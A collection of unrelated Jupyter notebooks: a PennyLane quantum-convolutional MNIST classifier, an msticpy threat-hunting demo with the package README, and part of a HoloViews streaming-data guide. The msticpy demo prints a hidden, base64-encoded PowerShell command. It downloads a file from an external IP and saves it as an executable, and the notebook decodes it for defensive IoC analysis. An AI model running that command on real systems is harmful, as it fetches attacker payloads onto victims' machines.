Make sure no pastrami sandwiches end up in finished_sandwiches.
| github_jupyter |
```
# %matplotlib inline
import matplotlib.pyplot as plt
from mpl_toolkits.axes_grid1 import make_axes_locatable
import numpy as np
import tensorflow as tf
from tensorflow.keras.utils import to_categorical
```
# Loading Raw Data
```
(x_train, y_train), (x_test, y_test) = tf.keras.datasets.mnist.load_data()
x_train = x_train[:, 0:27, 0:27]
x_test = x_test[:, 0:27, 0:27]
x_train_flatten = x_train.reshape(x_train.shape[0], x_train.shape[1]*x_train.shape[2])/255.0
x_test_flatten = x_test.reshape(x_test.shape[0], x_test.shape[1]*x_test.shape[2])/255.0
print(x_train_flatten.shape, y_train.shape)
print(x_test_flatten.shape, y_test.shape)
x_train_0 = x_train_flatten[y_train == 0]
x_train_1 = x_train_flatten[y_train == 1]
x_train_2 = x_train_flatten[y_train == 2]
x_train_3 = x_train_flatten[y_train == 3]
x_train_4 = x_train_flatten[y_train == 4]
x_train_5 = x_train_flatten[y_train == 5]
x_train_6 = x_train_flatten[y_train == 6]
x_train_7 = x_train_flatten[y_train == 7]
x_train_8 = x_train_flatten[y_train == 8]
x_train_9 = x_train_flatten[y_train == 9]
x_train_list = [x_train_0, x_train_1, x_train_2, x_train_3, x_train_4, x_train_5, x_train_6, x_train_7, x_train_8, x_train_9]
print(x_train_0.shape)
print(x_train_1.shape)
print(x_train_2.shape)
print(x_train_3.shape)
print(x_train_4.shape)
print(x_train_5.shape)
print(x_train_6.shape)
print(x_train_7.shape)
print(x_train_8.shape)
print(x_train_9.shape)
x_test_0 = x_test_flatten[y_test == 0]
x_test_1 = x_test_flatten[y_test == 1]
x_test_2 = x_test_flatten[y_test == 2]
x_test_3 = x_test_flatten[y_test == 3]
x_test_4 = x_test_flatten[y_test == 4]
x_test_5 = x_test_flatten[y_test == 5]
x_test_6 = x_test_flatten[y_test == 6]
x_test_7 = x_test_flatten[y_test == 7]
x_test_8 = x_test_flatten[y_test == 8]
x_test_9 = x_test_flatten[y_test == 9]
x_test_list = [x_test_0, x_test_1, x_test_2, x_test_3, x_test_4, x_test_5, x_test_6, x_test_7, x_test_8, x_test_9]
print(x_test_0.shape)
print(x_test_1.shape)
print(x_test_2.shape)
print(x_test_3.shape)
print(x_test_4.shape)
print(x_test_5.shape)
print(x_test_6.shape)
print(x_test_7.shape)
print(x_test_8.shape)
print(x_test_9.shape)
```
# Selecting the dataset
Output: X_train, Y_train, X_test, Y_test
```
n_train_sample_per_class = 200
n_class = 4
X_train = x_train_list[0][:n_train_sample_per_class, :]
Y_train = np.zeros((X_train.shape[0]*n_class,), dtype=int)
for i in range(n_class-1):
X_train = np.concatenate((X_train, x_train_list[i+1][:n_train_sample_per_class, :]), axis=0)
Y_train[(i+1)*n_train_sample_per_class:(i+2)*n_train_sample_per_class] = i+1
X_train.shape, Y_train.shape
n_test_sample_per_class = int(0.25*n_train_sample_per_class)
X_test = x_test_list[0][:n_test_sample_per_class, :]
Y_test = np.zeros((X_test.shape[0]*n_class,), dtype=int)
for i in range(n_class-1):
X_test = np.concatenate((X_test, x_test_list[i+1][:n_test_sample_per_class, :]), axis=0)
Y_test[(i+1)*n_test_sample_per_class:(i+2)*n_test_sample_per_class] = i+1
X_test.shape, Y_test.shape
```
# Dataset Preprocessing
```
X_train = X_train.reshape(X_train.shape[0], 27, 27)
X_test = X_test.reshape(X_test.shape[0], 27, 27)
X_train.shape, X_test.shape
Y_train = to_categorical(Y_train)
Y_test = to_categorical(Y_test)
```
# Quantum
```
import pennylane as qml
from pennylane import numpy as np
from pennylane.optimize import AdamOptimizer, GradientDescentOptimizer
qml.enable_tape()
from tensorflow.keras.utils import to_categorical
# Set a random seed
np.random.seed(2020)
# Define output labels as quantum state vectors
def density_matrix(state):
"""Calculates the density matrix representation of a state.
Args:
state (array[complex]): array representing a quantum state vector
Returns:
dm: (array[complex]): array representing the density matrix
"""
return state * np.conj(state).T
label_0 = [[1], [0]]
label_1 = [[0], [1]]
state_labels = [label_0, label_1]
n_qubits = n_class
dev_fc = qml.device("default.qubit", wires=n_qubits)
@qml.qnode(dev_fc)
def q_fc(params, inputs):
"""A variational quantum circuit representing the DRC.
Args:
params (array[float]): array of parameters
inputs = [x, y]
x (array[float]): 1-d input vector
y (array[float]): single output state density matrix
Returns:
float: fidelity between output state and input
"""
# layer iteration
for l in range(len(params[0])):
# qubit iteration
for q in range(n_qubits):
# gate iteration
for g in range(int(len(inputs)/3)):
qml.Rot(*(params[0][l][q][3*g:3*(g+1)] * inputs[3*g:3*(g+1)] + params[1][l][q][3*g:3*(g+1)]), wires=q)
return [qml.expval(qml.Hermitian(density_matrix(state_labels[0]), wires=[i])) for i in range(n_qubits)]
dev_conv = qml.device("default.qubit", wires=9)
@qml.qnode(dev_conv)
def q_conv(conv_params, inputs):
"""A variational quantum circuit representing the Universal classifier + Conv.
Args:
params (array[float]): array of parameters
x (array[float]): 2-d input vector
y (array[float]): single output state density matrix
Returns:
float: fidelity between output state and input
"""
# layer iteration
for l in range(len(conv_params[0])):
# RY layer
# height iteration
for i in range(3):
# width iteration
for j in range(3):
qml.RY((conv_params[0][l][3*i+j] * inputs[i, j] + conv_params[1][l][3*i+j]), wires=(3*i+j))
# entangling layer
for i in range(9):
if i != (9-1):
qml.CNOT(wires=[i, i+1])
return qml.expval(qml.PauliZ(0) @ qml.PauliZ(1) @ qml.PauliZ(2) @ qml.PauliZ(3) @ qml.PauliZ(4) @ qml.PauliZ(5) @ qml.PauliZ(6) @ qml.PauliZ(7) @ qml.PauliZ(8))
a = np.zeros((2, 1, 9))
q_conv(a, X_train[0, 0:3, 0:3])
a = np.zeros((2, 1, n_class, 9))
q_fc(a, X_train[0, 0, 0:9])
class class_weights(tf.keras.layers.Layer):
def __init__(self):
super(class_weights, self).__init__()
w_init = tf.random_normal_initializer()
self.w = tf.Variable(
initial_value=w_init(shape=(1, n_class), dtype="float32"),
trainable=True,
)
def call(self, inputs):
return (inputs * self.w)
# Input image, size = 27 x 27
X = tf.keras.Input(shape=(27,27), name='Input_Layer')
# Specs for Conv
c_filter = 3
c_strides = 2
# First Quantum Conv Layer, trainable params = 18*L, output size = 13 x 13
num_conv_layer_1 = 2
q_conv_layer_1 = qml.qnn.KerasLayer(q_conv, {"conv_params": (2, num_conv_layer_1, 9)}, output_dim=(1), name='Quantum_Conv_Layer_1')
size_1 = int(1+(X.shape[1]-c_filter)/c_strides)
q_conv_layer_1_list = []
# height iteration
for i in range(size_1):
# width iteration
for j in range(size_1):
temp = q_conv_layer_1(X[:, 2*i:2*(i+1)+1, 2*j:2*(j+1)+1])
temp = tf.keras.layers.Reshape((1,))(temp)
q_conv_layer_1_list += [temp]
concat_layer_1 = tf.keras.layers.Concatenate(axis=1)(q_conv_layer_1_list)
reshape_layer_1 = tf.keras.layers.Reshape((size_1, size_1))(concat_layer_1)
# Second Quantum Conv Layer, trainable params = 18*L, output size = 6 x 6
num_conv_layer_2 = 2
q_conv_layer_2 = qml.qnn.KerasLayer(q_conv, {"conv_params": (2, num_conv_layer_2, 9)}, output_dim=(1), name='Quantum_Conv_Layer_2')
size_2 = int(1+(reshape_layer_1.shape[1]-c_filter)/c_strides)
q_conv_layer_2_list = []
# height iteration
for i in range(size_2):
# width iteration
for j in range(size_2):
temp = q_conv_layer_2(reshape_layer_1[:, 2*i:2*(i+1)+1, 2*j:2*(j+1)+1])
temp = tf.keras.layers.Reshape((1,))(temp)
q_conv_layer_2_list += [temp]
concat_layer_2 = tf.keras.layers.Concatenate(axis=1)(q_conv_layer_2_list)
reshape_layer_2 = tf.keras.layers.Reshape((size_2, size_2, 1))(concat_layer_2)
# Max Pooling Layer, output size = 9
max_pool_layer = tf.keras.layers.MaxPooling2D(pool_size=(2, 2), strides=None, name='Max_Pool_Layer')(reshape_layer_2)
reshape_layer_3 = tf.keras.layers.Reshape((9,))(max_pool_layer)
# Quantum FC Layer, trainable params = 18*L*n_class + 2, output size = 2
num_fc_layer = 1
q_fc_layer = qml.qnn.KerasLayer(q_fc, {"params": (2, num_fc_layer, n_class, 9)}, output_dim=n_class)(reshape_layer_3)
# Alpha Layer
alpha_layer = class_weights()(q_fc_layer)
model = tf.keras.Model(inputs=X, outputs=[alpha_layer])
model(X_train[0:5, :, :])
import keras.backend as K
# def custom_loss(y_true, y_pred):
# return K.sum(((y_true.shape[1]-2)*y_true+1)*K.square(y_true-y_pred))/len(y_true)
def custom_loss(y_true, y_pred):
return K.sum(K.square(y_true-y_pred))/len(y_true)
opt = tf.keras.optimizers.Adam(learning_rate=0.1)
model.compile(opt, loss=custom_loss, metrics=["accuracy"])
H = model.fit(X_train, Y_train, epochs=20, batch_size=32, validation_data=(X_test, Y_test), verbose=1)
# 1L QConv1, 1L QConv2, 1L QFC, no entangler at all
# 1 epoch = ... jam
8000/(60*60)
```
| github_jupyter |
# MSTICPY and Jupyter Notebooks
### [msticpy GitHub](https://github.com/microsoft/msticpy)
### Built to make writing and reading of CyberSec notebooks faster, simpler and cleaner
`!pip install msticpy`
### Ian Hellen
**Principal SDE Microsoft Threat Intelligence Center, Azure Cloud and AI**
Email [ianhelle@microsoft.com](mailto:ianhelle@microsoft.com)<br>
Twitter [@ianhellen](https://twitter.com/ianhellen)
# Authenticating and getting data
```
# Imports
from msticpy.nbtools import nbinit
nbinit.init_notebook(
namespace=globals(),
)
from msticpy.sectools.ip_utils import get_whois_info
from mp_data import TILookupDemo as TILookup
from mp_data import GeoLiteLookupDemo as GeoLiteLookup
from mp_data import get_whois_info_demo as get_whois_info
sns.set()
# Set up data and authenticate
ws_config = WorkspaceConfig(workspace="ASIHuntOMSWorkspaceV4")
qry_prov = QueryProvider(
data_environment='LocalData',
data_paths=["./data"],
query_paths=["./data"],
)
qry_prov.connect(connection_str=ws_config.code_connect_str)
```
## Viewing and Managing Alerts
```
from datetime import datetime
search_origin = datetime(2019, 2, 17)
search_q_times = nbwidgets.QueryTime(units='day', max_before=20,
before=3, after=2, max_after=5,
origin_time=search_origin, auto_display=True)
from msticpy.nbtools.timeline import display_timeline
def show_full_alert(input_alert):
global selected_alert
selected_alert = SecurityAlert(input_alert)
return nbdisplay.format_alert(selected_alert, show_entities=False)
alert_list = qry_prov.SecurityAlert.list_alerts(search_q_times)
utils.md("Alerts", "large, bold")
utils.md(f"From {search_q_times.start} to {search_q_times.end} - choose an alert to display", "bold")
display_timeline(data=alert_list, source_columns=["AlertName","CompromisedEntity"], group_by="Severity", height=200)
alert_select = nbwidgets.SelectAlert(alerts=alert_list, action=show_full_alert, auto_display=True)
# select an alert
alert_select._w_select_alert.index = 5
utils.md("Visualize Entities", "large, bold")
utils.md("The red circle is the alert object. Green circles are the related entities.")
alertentity_graph = create_alert_graph(selected_alert)
nbdisplay.plot_entity_graph(alertentity_graph, width=800, node_size=15)
```
## Context for an Event or Alert
### Display Process Tree, Process Timeline, Trawl for IoCs
```
# run the query to get the process tree
process_df = qry_prov.WindowsSecurity.get_process_tree(selected_alert,
start=search_q_times.start,
end=search_q_times.end)
from msticpy.nbtools import process_tree
utils.md("Process tree for alert process.", "bold, large")
process_tree.build_and_show_process_tree(data=process_df, legend_col="Account")
utils.md("Interactive event timeline view", "bold, large")
nbdisplay.display_timeline(data=process_df, alert=selected_alert,
title='Alert Process Session', height=150, range_tool=False)
utils.md("IoCs found in commandlines", "bold, large")
IoCExtract().extract(data=process_df, columns=['CommandLine'],
ioc_types=['ipv4', 'ipv6', 'dns', 'url', 'md5_hash', 'sha1_hash', 'sha256_hash'])
```
# Investigating obfuscated commands
<br><span style="font-family:monospace; font-size:x-large; overflow-wrap: break-word">
powershell.exe -nop -w hidden -encodedcommand SW52b2tlLVdlYlJlcXVlc3QgLVVyaSAiaHR0cDovLzM4Ljc1LjEzNy45OjkwODgvc3RhdGljL2VuY3J5cHQubWluLmpzIiAtT3V0RmlsZSAiYzpccHduZXIuZXhlIg==</span>
#### A common attacker technique for disguising their intent
```
separator = lambda: print("-" * 80)
encoded_cmd = '''powershell.exe -nop -w hidden -encodedcommand SW52b2tlLVdlYlJlc
XVlc3QgLVVyaSAiaHR0cDovLzM4Ljc1LjEzNy45OjkwODgvc3RhdGljL2VuY3J5cHQubWluLmpzIiAtT3V0RmlsZSAiYzpccHduZXIuZXhlIg=='''
utils.md("Encoded command", "bold, large")
print(encoded_cmd)
dec_string, dec_df = base64unpack.unpack_items(input_string=encoded_cmd)
separator()
utils.md("Decoded command", "bold, large")
print(dec_string)
separator()
iocs = IoCExtract().extract(dec_string)
utils.md("IoCs Found", "bold, large")
for ioc in iocs:
print(ioc, iocs[ioc])
separator()
# ti_lookup = TILookup() # Use this if not in demo mode
ti_lookup = TILookup()
utils.md("Threat Intel results", "bold, large")
for ioc_type, ioc_set in iocs.items():
if ioc_type not in ["ipv4","ipv6", "url"]:
continue
print(f"\nLooking up {ioc_type}s...", end="")
for ioc in ioc_set:
print(ioc, end="")
ti_results = ti_lookup.lookup_ioc(observable=ioc, ioc_type=ioc_type)
display(ti_lookup.result_to_df(ti_results)[["Ioc", "Details", "Severity", "RawResult"]])
```
# Network Data
## IP Geolocation of an Attacker
```
# Look up the location
geo = GeoLiteLookup()
_, ip_locs = geo.lookup_ip(ip_addr_list=list(iocs["ipv4"]))
from msticpy.nbtools.foliummap import FoliumMap, get_map_center
# calculate the map center (average of lats/longs)
lat_longs = [(ip["Location"]["Latitude"], ip["Location"]["Longitude"]) for ip in ip_locs]
map_center = sum([ll[0] for ll in lat_longs])/len(lat_longs), sum([ll[1] for ll in lat_longs])/len(lat_longs)
# build the map and display
geo_map = FoliumMap(location=map_center, zoom_start=5, height="75%", width="75%")
geo_map.add_ip_cluster(ip_entities=ip_locs, color='red')
utils.md("Geolocations for IP addresses", "large, bold")
utils.md("Click on a marker for more information")
display(geo_map.folium_map)
```
### Query network data
```
az_net_comms_df = qry_prov.Network.list_azure_network_flows_by_host(search_q_times, selected_alert)
for field in ["TimeGenerated", "FlowStartTime", "FlowEndTime", "FlowIntervalEndTime"]:
az_net_comms_df[field] = az_net_comms_df[field] + pd.Timedelta(1, "day")
# For demo purposes we're adding our suspect IP to the DataFrame
t_index = az_net_comms_df[
(az_net_comms_df["L7Protocol"] == "http")
& (az_net_comms_df["FlowStartTime"] == pd.Timestamp("2019-02-13 13:46:48"))
].index[0]
az_net_comms_df.loc[t_index, "PublicIPs"] = [["38.75.137.9"]]
az_net_comms_df.loc[t_index, "AllExtIPs"] = "38.75.137.9"
print(len(az_net_comms_df), "records read")
```
### Analyze Network traffic flows on host
#### Timelines of In/Out traffic and traffic by protocol shows anomlies on late 2/14/2019
```
timeline_plot = nbdisplay.display_timeline(
data=az_net_comms_df,
group_by="FlowDirection",
title="Network Flows by Direction - Note unusual cluster of inbound traffic",
time_column="FlowStartTime",
source_columns=["FlowType", "AllExtIPs", "L7Protocol", "FlowDirection"],
height=150,
legend="right",
yaxis=True
)
flow_plot = nbdisplay.display_timeline_values(
data=az_net_comms_df[az_net_comms_df["L7Protocol"] != "https"],
group_by="L7Protocol",
source_columns=["FlowStartTime",
"FlowType",
"AllExtIPs",
"L7Protocol",
"FlowDirection",
"TotalAllowedFlows"],
time_column="FlowStartTime",
title="Network flows by Layer 7 Protocol",
y="TotalAllowedFlows",
legend="right",
height=400,
kind=["vbar", "circle"]
)
```
### Lookup the ASN of the external IPs and see if there are unusual items
Note: the WHOIS lookups for each IP take some time...
In plot that there is a single IP flow burst for only a few ASNs (e.g. `AS-GLOBALTELEHOST, US` - the IP Address of our attacker) - most others are repeated over time.
```
az_http = az_net_comms_df[(az_net_comms_df["L7Protocol"] == "http")].copy()
az_http["ExtASN"] = az_http.apply(lambda x: get_whois_info(x.AllExtIPs, show_progress=True)[0], axis=1)
nbdisplay.display_timeline(
data=az_http,
group_by="ExtASN",
title="Network Flows by ASN",
time_column="FlowStartTime",
source_columns=["FlowType", "AllExtIPs", "L7Protocol", "FlowDirection", "ExtASN"],
height=300,
legend="right",
yaxis=False
);
```
# *end of demo*
---
# References Text
- Azure Sentinel Github Notebooks https://github.com/Azure/Azure-Sentinel/Notebooks/tree/master
- (Samples with data in Sample-Notebooks folder)
- msticpy Github https://github.com/Microsoft/msticpy
- msticpy Docs https://msticpy.readthedocs.io/en/latest/
- Azure Sentinel Tech Community https://techcommunity.microsoft.com/t5/Azure-Sentinel/bd-p/AzureSentinel
- Azure Sentinel Tech Community Blogs https://aka.ms/AzureSentinelBlog
- Jupyter Notebooks and Azure Sentinel HowTo https://docs.microsoft.com/en-us/azure/sentinel/notebooks
- Azure Sentinel Feedback and Questions: mailto:AzureSentinel@microsoft.com
- Azure Sentinel Discussion mailto:DiscussAzureSentinel@microsoft.com
### Notebook blogs https://aka.ms/AzureSentinelBlog
- Security Investigations with Jupyter and Azure Sentinel (parts 1-3)
- Why Use Jupyter for Security Investigations?
- Using Sigma Rules in Azure Sentinel?
- msticpy - Python Defender Tools
[ianhelle@microsoft.com](mailto:ianhelle@microsoft.com) Twitter [@ianhellen](https://twitter.com/ianhellen) LinkedIn [ianhellen](https://www.linkedin.com/in/ianhellen/)
# MSTIC Jupyter and Python Security Tools
### [msticpy GitHub](https://github.com/microsoft/msticpy)
Microsoft Threat Intelligence Python Security Tools.
The **msticpy** package was initially developed to support [Jupyter Notebook](https://jupyter-notebook.readthedocs.io/en/stable/examples/Notebook/What%20is%20the%20Jupyter%20Notebook.html)
authoring for [Azure Sentinel](https://azure.microsoft.com/en-us/services/azure-sentinel/).
Many of the included tools can be used in other security scenarios for threat hunting
and threat investigation. There are three main sub-packages:
- **sectools** - Python security tools to help with data enrichment,
analysis or investigation.
- **nbtools** - Jupyter-specific UI tools such as widgets, plotting and
other data display.
- **data** - data layer and pre-defined queries for Azure Sentinel, MDATP and
other data sources.
We welcome feedback, bug reports, suggestions for new features and contributions.
## Installing
`pip install msticpy`
or for the latest dev build
`pip install git+https://github.com/microsoft/msticpy`
## Documentation
Full documentation is at [ReadTheDocs](https://msticpy.readthedocs.io/en/latest/)
Sample notebooks for many of the modules are in the [docs/notebooks](https://github.com/microsoft/msticpy/blob/master/docs/notebooks) folder and accompanying notebooks.
You can also browse through the sample notebooks referenced at the end of this document
(especially the *Windows Alert Investigation* notebook) to see some of the functionality used in context.
---
## Security Tools Sub-package - `sectools`
This subpackage contains several modules helpful for working on security investigations and hunting:
### base64unpack
Base64 and archive (gz, zip, tar) extractor. Input can either be a single string
or a specified column of a pandas dataframe. It will try to identify any base64 encoded
strings and decode them. If the result looks like one of the supported archive types it
will unpack the contents. The results of each decode/unpack are rechecked for further
base64 content and will recurse down up to 20 levels (default can be overridden).
Output is to a decoded string (for single string input) or a DataFrame (for dataframe input).
[Base64Unpack Notebook](https://github.com/microsoft/msticpy/blob/master/docs/notebooks/Base64Unpack.ipynb)
### iocextract
Uses a set of builtin regular expressions to look for Indicator of Compromise (IoC) patterns.
Input can be a single string or a pandas dataframe with one or more columns specified as input.
The following types are built-in:
- IPv4 and IPv6
- URL
- DNS domain
- Hashes (MD5, SHA1, SHA256)
- Windows file paths
- Linux file paths (this is kind of noisy because a legal linux file path can have almost any character)
You can modify or add to the regular expressions used at runtime.
Output is a dictionary of matches (for single string input) or a DataFrame (for dataframe input).
[IoCExtract Notebook](https://github.com/microsoft/msticpy/blob/master/docs/notebooks/IoCExtract.ipynb)
### tiproviders
The TILookup class can lookup IoCs across multiple TI providers. builtin
providers include AlienVault OTX, IBM XForce, VirusTotal and Azure Sentinel.
The input can be a single IoC observable or a pandas DataFrame containing
multiple observables. Depending on the provider, you may require an account
and an API key. Some providers also enforce throttling (especially for free
tiers), which might affect performing bulk lookups.
For more details see `TIProviders` and
[TILookup Usage Notebook](https://github.com/microsoft/msticpy/blob/master/docs/notebooks/TIProviders.ipynb)
### vtlookup
Wrapper class around [Virus Total API](https://www.virustotal.com/en/documentation/public-api/).
Input can be a single IoC observable or a pandas DataFrame containing multiple observables.
Processing requires a Virus Total account and API key and processing performance is limited to
the number of requests per minute for the account type that you have.
Support IoC Types:
- Filehash
- URL
- DNS Domain
- IPv4 Address
[VTLookup Notebook](https://github.com/microsoft/msticpy/blob/master/docs/notebooks/VirusTotalLookup.ipynb)
### geoip
Geographic location lookup for IP addresses.
This module has two classes for different services:
- GeoLiteLookup - Maxmind Geolite (see <https://www.maxmind.com>)
- IPStackLookup - IPStack (see <https://ipstack.com>)
Both services offer a free tier for non-commercial use. However,
a paid tier will normally get you more accuracy, more detail and
a higher throughput rate. Maxmind geolite uses a downloadable database,
while IPStack is an online lookup (API key required).
[GeoIP Lookup Notebook](https://github.com/microsoft/msticpy/blob/master/docs/notebooks/GeoIPLookups.ipynb)
### eventcluster
This module is intended to be used to summarize large numbers of
events into clusters of different patterns. High volume repeating
events can often make it difficult to see unique and interesting items.
This is an unsupervised learning module implemented using SciKit Learn DBScan.
The module contains functions to generate clusterable features from
string data. For example, an administration command that
does some maintenance on thousands of servers with a commandline like the following
```bash
install-update -hostname {host.fqdn} -tmp:/tmp/{GUID}/rollback
```
can be collapsed into a single cluster pattern by ignoring the character
values of the host and guids in the string and using delimiters or tokens to
group the values. This allows you to more easily see distinct patterns of
activity.
[Event Clustering Notebook](https://github.com/microsoft/msticpy/blob/master/docs/notebooks/EventClustering.ipynb)
### outliers
Similar to the eventcluster module, but a little bit more experimental (read 'less tested').
It uses SkLearn Isolation Forest to identify outlier events in a single data set or using
one data set as training data and another on which to predict outliers.
### auditdextract
Module to load and decode Linux audit logs. It collapses messages sharing the same
message ID into single events, decodes hex-encoded data fields and performs some
event-specific formatting and normalization (e.g. for process start events it will
re-assemble the process command line arguments into a single string).
This is still a work-in-progress.
### syslog_utils
Module to support an investigation of a linux host with only syslog logging enabled.
This includes functions for collating host data, clusting logon events and detecting
user sessions containing suspicious activity.
### cmd_line
A module to support he detection of known malicious command line activity or suspicious
patterns of command line activity.
## Notebook tools sub-package - `nbtools`
This is a collection of display and utility modules designed to make working
with security data in Jupyter notebooks quicker and easier.
- nbwidgets - groups common functionality such as list pickers, time boundary settings, saving and retrieving environment variables into a single line callable command.
- nbdisplay - functions that implement common display of things like alerts, events in a slightly more consumable way than print()
- entityschema - implements entity classes (e.g. Host, Account, IPAddress) used in Log Analytics alerts and in many of these modules. Each entity encaspulates one or more properties related to the entity.
[Notebook Tools Notebook](https://github.com/microsoft/msticpy/blob/master/docs/notebooks/NotebookWidgets.ipynb) and [Event Timeline Visualization](https://github.com/microsoft/msticpy/blob/master/docs/notebooks/EventTimeline.ipynb)
## Data sub-package - `data`
These components are currently still part of the nbtools sub-package but will be
refactored to separate them into their own package.
- QueryProvider - extensible query library targeting Log Analytics or OData
endpoints. Built-in parameterized queries allow complex queries to be run
from a single function call. Add your own queries using a simple YAML
schema.
- security_alert and security_event - encapsulation classes for alerts and events.
- entity_schema - definitions for multiple entities (Host, Account, File, IPAddress,
etc.)
Each has a standard 'entities' property reflecting the entities found in the alert or event.
These can also be used as meta-parameters for many of the queries.
For example, the following query will extract the value for the `hostname` query parameter
from the alert:
`qry.list_host_logons(query_times, alert)`
[Data Queries Notebook](https://github.com/microsoft/msticpy/blob/master/docs/notebooks/Data_Queries.ipynb)
---
## Clone the notebooks in this repo to Azure Notebooks
Requires sign-in to Azure Notebooks
<a href="https://notebooks.azure.com/import/gh/Microsoft/msticpy">
<img src="https://notebooks.azure.com/launch.png" />
</a>
## More Notebooks
- [Account Explorer](https://github.com/Azure/Azure-Sentinel-Notebooks/blob/master/Entity%20Explorer%20-%20Account.ipynb)
- [Domain and URL Explorer](https://github.com/Azure/Azure-Sentinel-Notebooks/blob/master/Entity%20Explorer%20-%20Domain%20%26%20URL.ipynb)
- [IP Explorer](https://github.com/Azure/Azure-Sentinel-Notebooks/blob/master/Entity%20Explorer%20-%20IP%20Address.ipynb)
- [Linux Host Explorer](https://github.com/Azure/Azure-Sentinel-Notebooks/blob/master/Entity%20Explorer%20-%20Linux%20Host.ipynb)
- [Windows Host Explorer](https://github.com/Azure/Azure-Sentinel-Notebooks/blob/master/Entity%20Explorer%20-%20Windows%20Host.ipynb)
View directly on GitHub or copy and paste the link into [nbviewer.org](https://nbviewer.jupyter.org/)
## Notebook examples with saved data
See the following notebooks for more examples of the use of this package in practice:
- Windows Alert Investigation in [github](https://github.com/Azure/Azure-Sentinel-Notebooks/blob/master/Sample-Notebooks/Example%20-%20Guided%20Investigation%20-%20Process-Alerts.ipynb) or [NbViewer](https://nbviewer.jupyter.org/github/Azure/Azure-Sentinel-Notebooks/blob/master/Sample-Notebooks/Example%20-%20Guided%20Investigation%20-%20Process-Alerts.ipynb)
- Office 365 Exploration in [github](https://github.com/Azure/Azure-Sentinel-Notebooks/blob/master/Sample-Notebooks/Example%20-%20Guided%20Hunting%20-%20Office365-Exploring.ipynb) or [NbViewer](https://nbviewer.jupyter.org/github/Azure/Azure-Sentinel-Notebooks/blob/master/Sample-Notebooks/Example%20-%20Guided%20Hunting%20-%20Office365-Exploring.ipynb)
- Cross-Network Hunting in [github](https://github.com/Azure/Azure-Sentinel-Notebooks/blob/master/Sample-Notebooks/Example%20-%20Step-by-Step%20Linux-Windows-Office%20Investigation.ipynb) or [NbViewer](https://nbviewer.jupyter.org/github/Azure/Azure-Sentinel-Notebooks/blob/master/Sample-Notebooks/Example%20-%20Step-by-Step%20Linux-Windows-Office%20Investigation.ipynb)
## To-Do Items
- Add additional notebooks to document use of the tools.
- Expand list of supported TI provider classes.
## Supported Platforms and Packages
- msticpy is OS-independent
- Requires [Python 3.6 or later](https://www.python.org/dev/peps/pep-0494/)
- Requires the following python packages: pandas, bokeh, matplotlib, seaborn, setuptools, urllib3, ipywidgets, numpy, attrs, requests, networkx, ipython, scikit_learn, typing
- The following packages are recommended and needed for some specific functionality: Kqlmagic, maxminddb_geolite2, folium, dnspython, ipwhois
See [requirements.txt](requirements.txt) for more details and version requirements.
---
## Contributing
This project welcomes contributions and suggestions. Most contributions require you to agree to a
Contributor License Agreement (CLA) declaring that you have the right to, and actually do, grant us
the rights to use your contribution. For details, visit <https://cla.microsoft.com>.
When you submit a pull request, a CLA-bot will automatically determine whether you need to provide
a CLA and decorate the PR appropriately (e.g., label, comment). Simply follow the instructions
provided by the bot. You will only need to do this once across all repos using our CLA.
This project has adopted the [Microsoft Open Source Code of Conduct](https://opensource.microsoft.com/codeofconduct/).
For more information see the [Code of Conduct FAQ](https://opensource.microsoft.com/codeofconduct/faq/) or
contact [opencode@microsoft.com](mailto:opencode@microsoft.com) with any additional questions or comments.
| github_jupyter |
# Working with Streaming Data
"Streaming data" is data that is continuously generated, often by some external source like a remote website, a measuring device, or a simulator. This kind of data is common for financial time series, web server logs, scientific applications, and many other situations. We have seen how to visualize any data output by a callable in the [Live Data](06-Live_Data.ipynb) user guide and we have also seen how to use the HoloViews stream system to push events in the user guide sections [Responding to Events](11-Responding_to_Events.ipynb) and [Custom Interactivity](12-Custom_Interactivity.ipynb).
This user guide shows a third way of building an interactive plot, using ``DynamicMap`` and streams. Here, instead of pushing plot metadata (such as zoom ranges, user triggered events such as ``Tap`` and so on) to a ``DynamicMap`` callback, the underlying data in the visualized elements are updated directly using a HoloViews ``Stream``.
In particular, we will show how the HoloViews ``Pipe`` and ``Buffer`` streams can be used to work with streaming data sources without having to fetch or generate the data from inside the ``DynamicMap`` callable. Apart from simply setting element data from outside a ``DynamicMap``, we will also explore ways of working with streaming data coordinated by the separate [``streamz``](http://matthewrocklin.com/blog/work/2017/10/16/streaming-dataframes-1) library from Matt Rocklin, which can make building complex streaming pipelines much simpler.
As this notebook makes use of the ``streamz`` library, you will need to install it with ``conda install streamz`` or ``pip install streamz``.
```
import time
import numpy as np
import pandas as pd
import holoviews as hv
from holoviews.streams import Pipe, Buffer
import streamz
import streamz.dataframe
hv.extension('bokeh')
```
## ``Pipe``
A ``Pipe`` allows data to be pushed into a DynamicMap callback to change a visualization, just like the streams in the [Responding to Events](./11-Responding_to_Events.ipynb) user guide were used to push changes to metadata that controlled the visualization. A ``Pipe`` can be used to push data of any type and make it available to a ``DynamicMap`` callback. Since all ``Element`` types accept ``data`` of various forms we can use ``Pipe`` to push data directly to the constructor of an ``Element`` through a DynamicMap.
We can take advantage of the fact that most Elements can be instantiated without providing any data, so we declare the the ``Pipe`` with an empty list, declare the ``DynamicMap``, providing the pipe as a stream, which will dynamically update a ``VectorField`` :
```
pipe = Pipe(data=[])
vector_dmap = hv.DynamicMap(hv.VectorField, streams=[pipe])
vector_dmap.redim.range(x=(-1, 1), y=(-1, 1))
```
<img class="gif" src="https://assets.holoviews.org/gifs/guides/user_guide/Streaming_Data/pipe_vectorfield.gif"></img>
Having set up this ``VectorField`` tied to a ``Pipe`` we can start pushing data to it varying the orientation of the VectorField:
```
x,y = np.mgrid[-10:11,-10:11] * 0.1
sine_rings = np.sin(x**2+y**2)*np.pi+np.pi
exp_falloff = 1/np.exp((x**2+y**2)/8)
for i in np.linspace(0, 1, 25):
time.sleep(0.1)
pipe.send([x,y,sine_rings*i, exp_falloff])
```
This approach of using an element constructor directly does not allow you to use anything other than the default key and value dimensions. One simple workaround for this limitation is to use ``functools.partial`` as demonstrated in the **Controlling the length section** below.
Since ``Pipe`` is completely general and the data can be any custom type, it provides a completely general mechanism to stream structured or unstructured data. Due to this generality, ``Pipe`` does not offer some of the more complex features and optimizations available when using the ``Buffer`` stream described in the next section.
## ``Buffer``
While ``Pipe`` provides a general solution for piping arbitrary data to ``DynamicMap`` callback, ``Buffer`` on the other hand provides a very powerful means of working with streaming tabular data, defined as pandas dataframes, arrays or dictionaries of columns (as well as StreamingDataFrame, which we will cover later). ``Buffer`` automatically accumulates the last ``N`` rows of the tabular data, where ``N`` is defined by the ``length``.
